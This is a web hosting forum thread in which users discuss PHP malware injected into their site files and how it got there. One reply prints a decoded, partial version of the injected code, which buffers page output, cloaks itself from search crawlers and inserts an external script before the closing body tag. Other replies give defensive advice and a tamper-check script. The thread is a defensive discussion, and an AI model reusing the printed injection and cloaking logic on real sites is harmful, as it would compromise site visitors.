Page 1 of 2 12 LastLast
Results 1 to 15 of 19
  1. #1

    my site hacked by following php code

    some hacker insert the following code to my footer.php
    and AVG tell me that threat. Thanks AVG.
    AVG tell me the threat:

    I find that code and deleted it from my file. But I don't know how the hacker insert to my php file?

    Last edited by bear; 05-07-2010 at 09:55 AM.

  2. #2
    Join Date
    Oct 2009
    Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.

    Just for fun, here's that chunk decoded and cleaned up somewhat.

    if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    	if(!function_exists('mrobh')) {
    		if(!function_exists('gml')) {
    		 function gml() {
    		  if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
    		   return '<script src=""></script>';
    		  return "";
    		if(!function_exists('gzdecode')) {
    		 function gzdecode($var1) {
    		  if($var3&4) {
    		  if($var3&8) {
    		  if($var3&16) {
    		  if($var3&2) {
    		  if($var5===FALSE) {
    		  return $var5;
    		function mrobh($var6) {
    		 Header('Content-Encoding: none');
    		 if(preg_match('/\<\/body/si',$var7)) {
    		  return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
    		 } else {
    		  return $var7.gml();
    It's basically using an output buffer to capture the generated page, then injects an external script before the <body> tag.

  3. #3

    Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.


  4. #4
    I'm sure there are several approached to getting this done, I'm no expert in this, but one of my "clients" had this problem and each time he removed it it was back the next day.
    It turned out that when I went over his folders and files and set the correct permissions the problem stopped. For more info have a look at

  5. #5
    Join Date
    Nov 2005
    chmod is only protecting files from being modified by whatever method is being used. it isnt actually plugging the security vunerability that allowed it in the first place. Also chmod wont help you if your script is vunerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.

    Ideally shared hosting enviroments should not allow users to modify other files on the server outside of their root path, if this is not the case trouble your host to correct it. If they arnt locked out of other users directories it will be possible for them to do possibly more things than inject a snippit of code into a php script, including obtaining usernames and passwords to your database stored in plaintext configuration files.

  6. #6
    Thank you for clearing that up...

  7. #7
    The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.

  8. #8

  9. #9
    Join Date
    Oct 2009
    chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.

    It's a jungle out there.

  10. #10
    Join Date
    May 2010
    Samething happened for one of my clients , each file of his wordpress instalaltion got that dumb in side at the begining , we found a php script that clean up all files and also remove empty lines

  11. #11
    Possibly a PHP Shell?

  12. #12
    I think this is weak security of file manager or picture manager plugins in wysiwyg editors like TinyMCE
    here is our case in old Mambo CMS installation

  13. #13
    Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.

  14. #14
    The people who create this code and hack it onto people's site are the most despicable of all internet criminals.

    I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.

    Their script finds every PHP file and prepends a chunk of PHP.

    So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.

    HTML Code:
    # this file should be less than 570 chars in length
    //echo strlen($data);
    if (strlen($data)>$expected)
    	//mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail');
    	if (!file_exists('index.phpx')) rename('index.php','index.phpx');
    	// write this despite the existance of index.phpx in case they strike again
    	$fh = fopen('index.php', 'w') or die("can't open file");
    	fwrite($fh, 'Sorry, we are currently offline');

  15. #15
    Join Date
    Aug 2009
    United Kingdom
    You can infect every page on a website with a PHP shell if they haven't secured PHP

Page 1 of 2 12 LastLast

Similar Threads

  1. Hacked; Warning: count.php?o=2 code
    By mifbody in forum Hosting Security and Technology
    Replies: 30
    Last Post: 07-31-2008, 06:50 AM
  2. How to show HTML and PHP code on a site?
    By Eiolon in forum Programming Discussion
    Replies: 11
    Last Post: 10-18-2007, 09:20 AM
  3. Site Hacked via php script placed in WordPress Uploads directory
    By cnymike in forum Hosting Security and Technology
    Replies: 8
    Last Post: 04-08-2007, 08:38 AM
  4. PHP/MYSQL Trivia site code job
    By mrsam in forum Employment / Job Offers
    Replies: 2
    Last Post: 11-26-2005, 03:30 PM
  5. Code my Teen Site in PHP and MYSQL.
    By in forum Employment / Job Offers
    Replies: 3
    Last Post: 08-22-2005, 04:27 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts